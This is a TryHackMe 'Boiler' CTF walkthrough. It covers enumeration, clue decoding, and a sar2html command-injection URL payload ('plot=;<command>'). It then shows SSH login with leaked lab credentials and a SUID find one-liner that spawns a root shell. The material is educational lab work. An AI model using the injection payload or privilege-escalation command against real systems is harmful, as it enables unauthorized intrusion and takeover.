Boiler CTF TryHackMe
Hello folks! I am Ashutosh Gupta a.k.a. “m3ta_c1ph4r”. I have been doing TryHackMe for the last two months. I can say that it is the best place for beginners and intermediates. There are many rooms in which you can practise and polish your skills. There are rooms on every topic, labelled from easy to hard, with step-by-step exploitation of machines. This is my first TryHackMe writeup on Medium. So let's begin the fun!
Link for the room: https://tryhackme.com/room/boilerctf2
So first you have to join the room and then deploy the machine.
TASK 1 : ENUMERATION
- NMAP:
As many of you know, the first thing we do is an nmap scan. The command is:
$ nmap -sC -sV 10.10.32.78 -oN nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 16:55 IST
Nmap scan report for 10.10.32.78
Host is up (0.32s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.82.50
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open http MiniServ 1.930 (Webmin httpd)
|_http-server-header: MiniServ/1.930
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.56 seconds
-sC enables the default script scan, i.e. it runs Nmap's default NSE scripts against the open ports.
-sV enables version detection to determine service/version info.
Here you see there are three open ports. As you can see, the FTP server allows anonymous login, so let's check if we find anything there.
$ ftp 10.10.32.78
Using this command we connect; it asks for a name, give it anonymous. Then you will be logged in to the FTP server.
Then we check the files and directories present using the ls command. When you type it you will see there are no files or directories. So let's check for hidden ones, using the ls -la command.
- l means the output is given in long list format
- a means show all files, including hidden ones (names starting with a dot)
When you type this you will see a hidden file named .info.txt. You can't open that file directly, because FTP is just a file transfer protocol, but you can download it using the command get .info.txt.
Then type exit, and you will have that file on your PC.
And here you get the first answer of Task 1.
Task 1–1:
txt
Task 1–2:
nmap -p- <machine ip>
Here you find the highest port is 55007, and there you see SSH is running.
Task 1–3:
In the nmap you see
10000/tcp open http MiniServ 1.930 (Webmin httpd)
webmin is running
Task 1–4:
Google for an exploit for Webmin. On checking, you will find there is no exploit available for that version of the service. The service is up to date.
Let's come back to the file we got from FTP.
$ cat .info.txt
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!
You may be wondering what this is. Let me make it clear: this is encoded text, ROT13. It is a substitution cipher that replaces each letter with the 13th letter after it. Let's decode it. I used this website to decode it.
This is what you get after decoding:
Just wanted to see if you find it. Lol. Remember: Enumeration is the key!
It just says that enumeration is the key, which means we have to do more enumeration.
- Gobuster
Let's do directory fuzzing. For this I used gobuster.
gobuster dir -u http://10.10.32.78/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,xml -t 100 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.32.78/
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,xml,php,html
[+] Timeout: 10s
===============================================================
2020/08/16 17:51:00 Starting gobuster
===============================================================
/index.html (Status: 200)
/manual (Status: 301)
/robots.txt (Status: 200)
/joomla (Status: 301)
dir means directory/file brute-forcing mode
-u is used for giving the URL or target.
-w is used for giving the wordlist path.
-x is used to also search for files with those extensions.
-t is used for setting the number of threads, to increase the speed of the scan.
Let's check what we got in robots.txt:
User-agent: *
Disallow: /
/tmp
/.ssh
/yellow
/not
/a+rabbit
/hole
/or
/is
/it
079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075
If you open all of those directories you get Not Found, because they are all rabbit holes. So let's see what these numbers are, and decode them.
First we convert from ASCII codes to text using this link: http://www.unit-conversion.info/texttools/ascii/#data
We got this after decoding:
OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQK
Then use CyberChef to decode it from base64 to text.
After decoding we get a hash:
99b0660cd95adea327c54182baa51584
Then I used CrackStation to crack it: https://crackstation.net/
There I learned that this is an MD5 hash, and the cracked plaintext is:
kidding
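Both clues above (the ROT13 note from .info.txt and the decimal-ASCII / base64 chain from robots.txt) can be decoded offline in a few lines. This is an added example, not code from the original writeup; the md5_matches helper is a way to verify a CrackStation result locally rather than taking the site's word for it.

```python
import base64
import codecs
import hashlib

# The two clues exactly as the room presents them (copied from the writeup).
INFO_TXT = "Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!"
ROBOTS_LINE = (
    "079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 "
    "077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 "
    "079 068 081 075"
)


def rot13(text: str) -> str:
    """ROT13 is its own inverse, so the same call encodes and decodes."""
    return codecs.decode(text, "rot_13")


def decimal_ascii_to_text(codes: str) -> str:
    """Space-separated decimal byte values -> string.

    int() ignores the leading zeros ('079'); values outside printable ASCII
    raise so a mangled clue is noticed instead of producing garbage.
    """
    values = [int(tok) for tok in codes.split()]
    if any(not 32 <= v < 127 for v in values):
        raise ValueError("clue contains non-printable byte values")
    return "".join(chr(v) for v in values)


def decode_robots_clue(codes: str) -> str:
    """decimal ASCII -> base64 text -> bytes -> hex digest as a string.

    The final 075 ('K') encodes a trailing newline, so the result is stripped.
    """
    b64 = decimal_ascii_to_text(codes)
    return base64.b64decode(b64, validate=True).decode("ascii").strip()


def md5_matches(candidate: str, hexdigest: str) -> bool:
    """Check a plaintext from a lookup service (the writeup used CrackStation)
    against the digest locally instead of trusting the site."""
    return hashlib.md5(candidate.encode()).hexdigest() == hexdigest.lower()


if __name__ == "__main__":
    print(rot13(INFO_TXT))
    digest = decode_robots_clue(ROBOTS_LINE)
    print(digest, "->", len(digest), "hex chars")
    print("candidate 'kidding' matches:", md5_matches("kidding", digest))
```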
So this might be a password. But for what, we don't know yet.
So let's look at the other things we got from gobuster. We have two directories, named joomla and manual. Let's check on Google what joomla is.
Task 1–5:
If you google joomla, you find that Joomla is a CMS.
So your answer for this is "joomla"
Let's enumerate more. As joomla is a sub-directory, we can fuzz for sub-directories inside it as well.
gobuster dir -u http://<ip>/joomla -w /usr/share/dirb/wordlists/common.txt -t 50
[+] Url: http://10.10.2.36/joomla
[+] Threads: 50
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/16 20:43:44 Starting gobuster
===============================================================
/_files (Status: 301)
/_test (Status: 301)
/~www (Status: 301)
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/_archive (Status: 301)
/_database (Status: 301)
/bin (Status: 301)
/build (Status: 301)
/cache (Status: 301)
/components (Status: 301)
/images (Status: 301)
/includes (Status: 301)
/installation (Status: 301)
/language (Status: 301)
/layouts (Status: 301)
/libraries (Status: 301)
/media (Status: 301)
/modules (Status: 301)
/plugins (Status: 301)
/index.php (Status: 200)
/templates (Status: 301)
/tests (Status: 301)
/tmp (Status: 301)
===============================================================
As there are quite a lot of directories, after going through all of them I found one interesting directory named “/_test”.
On the left you see “sar2html”. So I searched for this on Google, and there I found an exploit on Exploit-DB: https://www.exploit-db.com/exploits/47204
With this exploit you can do Remote Code Execution (RCE).
http://<ipaddr>/index.php?plot=;<command-here> will execute
http://10.10.2.36/joomla/_test/index.php?plot=;whoami
When you click on "select host" you see, as the last item, the name of the user, i.e. www-data.
Then I wanted to see which files are on the server, so I ran the ls command.
Task 1–6:
Here we find four files, but the odd one out is log.txt.
So the answer is log.txt
So I opened it using cat log.txt.
In the sixth entry you see a username and password:
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$
So the username is basterd and the password is superduperp@$$.
Now we can SSH in, as we know the username, the password and the host (SSH is on port 55007, as found earlier).
And Boom! you got the shell.
Task 2: POST Enumeration
TASK 2–1 :
As you have the shell, let's check the files and directories. There you find one file named backup.sh.
Let's check what is in backup.sh:
$ cat backup.sh
REMOTE=1.2.3.4
SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log
DATE=`date +%y\.%m\.%d\.`
USER=stoner
#superduperp@$$no1knows
ssh $USER@$REMOTE mkdir $TARGET/$DATE
if [ -d "$SOURCE" ]; then
    for i in `ls $SOURCE | grep 'data'`;do
        echo "Begining copy of" $i >> $LOG
        scp $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
        echo $i "completed" >> $LOG
        if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
            rm $SOURCE/$i
            echo $i "removed" >> $LOG
            echo "####################" >> $LOG
        else
            echo "Copy not complete" >> $LOG
            exit 0
        fi
    done
else
    echo "Directory is not present" >> $LOG
    exit 0
fi
If you look closely, you find another user and password:
USER=stoner
superduperp@$$no1knows
So the answer for task 2–1 is backup, because the question doesn't ask for the extension; it asks where the other user and password are stored.
answer is: backup
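Two of the credentials on this box leaked through plain text nobody was meant to read: a password appended as a comment to an sshd line in log.txt, and a password parked in a comment in backup.sh. The scanner below is an added example, not code from the room or the writeup; the two samples are constructed from the lines shown above, and the looks_like_secret heuristic is my own.

```python
import re
from typing import List, NamedTuple


class Finding(NamedTuple):
    path: str
    lineno: int
    kind: str
    secret: str

# Constructed samples modelled on the two files shown in the writeup.
SAMPLES = {
    "log.txt": (
        "Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd "
        "from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$\n"
        "Aug 20 11:17:02 parrot sshd[2451]: session opened for user basterd\n"
    ),
    "backup.sh": ("REMOTE=1.2.3.4\nUSER=stoner\n#superduperp@$$no1knows\n"
                  "ssh $USER@$REMOTE mkdir $TARGET/$DATE\n"),
}
# Explicit annotations such as "#pass: x", "password=x" or "pwd: x".
ANNOTATED = re.compile(r"(?i)\b(?:pass(?:word)?|pwd)\s*[:=]\s*(\S+)")
# A comment whose whole body is one opaque token: how a credential
# "parked" in a script comment tends to look.
COMMENT = re.compile(r"^\s*#\s*(\S+)\s*$")


def looks_like_secret(token: str) -> bool:
    """Heuristic (mine): 8+ chars mixing letters with digits or symbols,
    and not a shebang such as #!/bin/bash."""
    if token.startswith("!") or len(token) < 8:
        return False
    return (any(c.isalpha() for c in token)
            and any(c.isdigit() or c in "@$!%*?&" for c in token))


def scan_text(path: str, text: str) -> List[Finding]:
    """Return every suspected credential in text, with its line number."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = ANNOTATED.search(line)
        if m:
            findings.append(Finding(path, lineno, "annotated", m.group(1)))
            continue
        m = COMMENT.match(line)
        if m and looks_like_secret(m.group(1)):
            findings.append(Finding(path, lineno, "bare-comment", m.group(1)))
    return findings


def scan_all(samples: dict) -> List[Finding]:
    return [f for path, text in samples.items() for f in scan_text(path, text)]
```

Run over a real home directory or /var/log the same patterns would have flagged both files on this box before an attacker read them.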
Let's log in as stoner using SSH.
Task 2–2:
Let's find the user flag. Usually the user flag is in /home/<username>.
So let's go there: cd /home/stoner
And run ls -la to check what files and directories we have.
stoner@Vulnerable:~$ ls -la
total 20
drwxr-x--- 4 stoner stoner 4096 Aug 16 19:13 .
drwxr-xr-x 4 root root 4096 Aug 22 2019 ..
drwx------ 2 stoner stoner 4096 Aug 16 19:13 .cache
drwxrwxr-x 2 stoner stoner 4096 Aug 22 2019 .nano
-rw-r--r-- 1 stoner stoner 34 Aug 21 2019 .secret
Here we have one hidden file; let's see what it is.
stoner@Vulnerable:~$ cat .secret
You made it till here, well done.
So the user flag is:
You made it till here, well done.
Task 2 Privilege Escalation:
So we are at the end of our session. Let's do it.
For privilege escalation my methodology is to check the SUID binaries first.
find / -perm -u=s 2>/dev/null
/ is the location to search, i.e. the whole file system
-perm matches files by their permission bits
-u=s matches files with the setuid bit set, so they run with the privileges of the file's owner (root, for the ones below)
2>/dev/null handles the errors: they are not shown, but sent to /dev/null, the black hole of Linux.
So let's see the output:
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/at
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmap
So these are the binaries that run with root privileges. For finding out which of them can be exploited, the best resource, I would say, is GTFOBins: https://gtfobins.github.io/
You can search for each of these on GTFOBins, and if you find the SUID tag there, then it is exploitable.
Task 2–3:
I searched through them and found one named find. So let's try this.
So the answer for this is - find
But if you copy this command, sudo sh -c 'cp $(which find) .; chmod +s ./find', you get an error.
Because of this you can't run the second one as written either: if you look at the last one, it runs a ./find file, but we haven't made this. But we can try without ./, as the find command already exists (with SUID set).
find . -exec /bin/sh -p \; -quit
So let's copy this and paste it, fingers crossed that it works.
And boom! we got the root :)
Task 2–4:
So we can take the root flag.
# cd /root
# ls
root.txt
# cat root.txt
It wasn't that hard, was it?
So the root flag is:
It wasn't that hard, was it?
I hope you enjoyed this and learned something. It was a fun CTF with a lot of trolling.
So see you again!
Linkedin profile : www.linkedin.com/in/ashutosh-gupta-152142193
Instagram profile for the updates : https://www.instagram.com/gupta_ashuu/